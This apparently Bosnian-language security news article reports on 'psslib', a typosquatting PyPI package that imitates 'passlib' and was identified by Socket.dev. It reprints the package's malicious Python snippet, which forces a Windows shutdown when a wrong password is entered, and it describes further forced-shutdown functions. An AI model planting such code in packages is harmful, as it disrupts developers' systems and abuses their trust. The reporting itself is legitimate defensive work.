Na Python Package Indexu (PyPI) pojavio se zlonamjerni paket koji se lažno predstavlja kao legitimna biblioteka za sigurnost lozinki, a koji je usmjeren na Windows developere, uzrokujući trenutna gašenja sistema pri pogrešnim unosima lozinke.
Ovaj zlonamjerni paket, nazvan “psslib”, predstavlja sofisticiran napad tipososkvetinga na široko korištenu “passlib” biblioteku, koja bilježi preko 8.9 miliona mjesečnih preuzimanja od strane developera koji implementiraju sigurne sisteme autentifikacije.
Malware demonstrira posebno podmukao pristup eksploatisanjem povjerenja developera u pakete fokusirane na sigurnost. Za razliku od tradicionalnih napada na lanac nabavke, koji djeluju prikriveno radi krađe podataka ili uspostavljanja perzistencije, ovaj paket daje prednost trenutnom poremećaju nad operacijama prikrivanja. Paket, objavljen od strane prijetnje poznate kao “umaraq”, lažno se reklamira kao sigurnosno rješenje koje će “osigurati vaš Python program”, dok zapravo sadrži destruktivni kod dizajniran za nanošenje trenutne štete sistemu.
Istraživači Socket.dev-a su identifikovali zlonamjerni paket putem svojih AI-pogonjenih sistema za skeniranje, koji su označili destruktivno ponašanje gašenja sistema kao anomaliju za navodnu sigurnosnu biblioteku. Paket ostaje aktivan na PyPI-u uprkos formalnim peticijama za njegovo uklanjanje, nastavljajući da predstavlja rizik za nesvjesne developere koji bi mogli slučajno instalirati verziju pogođenu tipososkvetingom tokom rutinskog upravljanja zavisnostima.
Napad specifično cilja na Windows razvojna okruženja, gdje Python developeri često posjeduju povišene sistemske privilegije neophodne za automatizaciju i zadatke razvoja aplikacija. Kada ovi developeri integrišu zlonamjerni paket u svoje radne tokove, destruktivni payload dobija pristup na nivou sistema neophodan za izvršavanje trenutnih komandi za gašenje, potencijalno uzrokujući gubitak podataka i poremećaj radnih procesa unutar razvojnih timova.
Tehnička implementacija i mehanizam napada: psslib paket implementira svoj destruktivni payload kroz naizgled jednostavne Python funkcije koje koriste easygui biblioteku za interakciju s korisnikom i os modul za sistemske komande. Primarni vektor napada fokusira se na funkciju provjere lozinke koja trenutno pokreće Windows gašenje kada korisnici unesu pogrešne akreditive.
“`python
import os
import easygui
def spc(password):
if easygui.enterbox(‘enter password:-‘) != password:
os.system(“shutdown /s /t 1”) # Shutdown in 1 second
“`
Pored gašenja pokrenutog lozinkom, paket uključuje dodatne funkcije dizajnirane da prošire vektore napada. Funkcija “src()” omogućava direktno gašenje sistema bez ikakvih zahtjeva za autentifikacijom, dok funkcija “error()” kombinuje prikaz poruke o grešci sa izvršavanjem prisilnog gašenja. Ovi višestruki vektori napada osiguravaju da se zlonamjerni payload može izvršiti bez obzira na to kako developeri integrišu paket u svoje aplikacije, maksimizirajući potencijal za sistemski poremećaj u raznim scenarijima implementacije.
